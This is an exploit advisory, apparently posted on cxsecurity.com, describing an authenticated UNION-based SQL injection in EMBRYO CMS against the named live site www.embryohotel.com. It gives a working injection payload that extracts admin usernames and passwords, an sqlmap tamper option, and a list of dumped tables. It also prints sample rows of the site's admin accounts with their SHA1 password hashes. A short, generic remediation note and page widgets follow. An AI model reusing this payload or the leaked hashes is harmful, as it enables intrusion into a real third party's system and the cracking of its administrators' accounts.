EMBRYO CMS by Pyxis Studio - Authenticated SQL Injection on www.embryohotel.com

# Exploit Title: EMBRYO CMS by Pyxis Studio - Authenticated SQL Injection # Exploited Host: https://www.embryohotel.com/ # Exploit Author: 0x6ick # Vendor Homepage: https://pyxisstudio.com/ # Software Link: N/A # Version: unknown # Tested On: Linux server running MySQL 5.0.12+ ## Vulnerability Details: An SQL injection vulnerability was discovered in the EMBRYO CMS by Pyxis Studio used on www.embryohotel.com. The vulnerable parameter allows authenticated users to perform UNION-based SQL injection, leading to full database dump, including admin credentials. ## Proof of Concept: Vulnerable Parameter: GET /somepage.php?id=1' UNION SELECT ... Payload: 1' UNION SELECT 1,2,group_concat(username,0x3a,password),4 FROM admin-- Tamper: `--tamper=space2comment` ## Dumped Tables: - admin.csv (with SHA1-hashed passwords) - contact.csv - room.csv, room_image.csv - room_option.csv, room_option_reletive.csv - slideshow.csv, slideshow_mobile.csv - local_area.csv Example Dump: id,password,username,permission 1,e742c63f03ab602f2b38433ffc28b5145ba1332d,admin,1 2,89d36b5c82506f89c135b9794af7212cb5406dfcf,ARMERX,0 ## Impact: Full disclosure of administrator credentials and sensitive data. ## Recommendation: Sanitize all user input using parameterized queries. Avoid direct SQL string concatenation. Update EMBRYO CMS with proper security filters. # Discovered & Reported by: 0x6ick

References:

https://www.0x6ick.zone.id/2025/05/panduan-menggunakan-sqlmap-live-target.html?m=1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top